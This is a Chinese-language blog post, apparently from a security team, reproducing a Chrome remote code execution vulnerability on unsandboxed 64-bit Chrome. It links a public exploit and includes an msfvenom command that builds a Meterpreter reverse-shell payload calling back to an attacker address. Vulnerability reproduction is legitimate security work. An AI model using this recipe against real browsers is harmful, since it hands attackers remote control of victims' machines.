首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Chrome远程代码执行并移植MSF控制

Chrome远程代码执行并移植MSF控制

作者头像
Khan安全团队
发布2021-04-21 10:08:10
发布2021-04-21 10:08:10
1.2K0
举报
文章被收录于专栏:Khan安全团队Khan安全团队

国家信息安全漏洞共享平台(CNVD)收录了 Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。CNVD 对该漏洞的综合评级为 “高危”。

Google Chrome 0day 远程代码执行漏洞复现

条件:

1.环境win10、win7均可,sever不行

2.关闭沙箱模式-no-sandbox

3.chrome客户端需64位(Google Chrome < = 89.0.4389.114)


实验:

使用命令关闭沙箱模式-no-sandbox

Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day

将shellcode换成msf:

这里有集成的脚本:https://github.com/badboycxcc/script

1.生成shellcode:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx lport=4444 -f csharp -o payload3.txt

将生成的shellcode进行替换即可

使用谷歌打开恶意html文件即可反弹shell

据说沙盒可以控制

漏洞处置建议

目前,Google 公司尚未发布新版本或补丁包修复漏洞,CNVD 建议用户使用 Google Chrome 浏览器时不关闭默认沙盒模式,同时谨慎访问来源不明的网页链接或文件。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-04-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Google Chrome 0day 远程代码执行漏洞复现
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档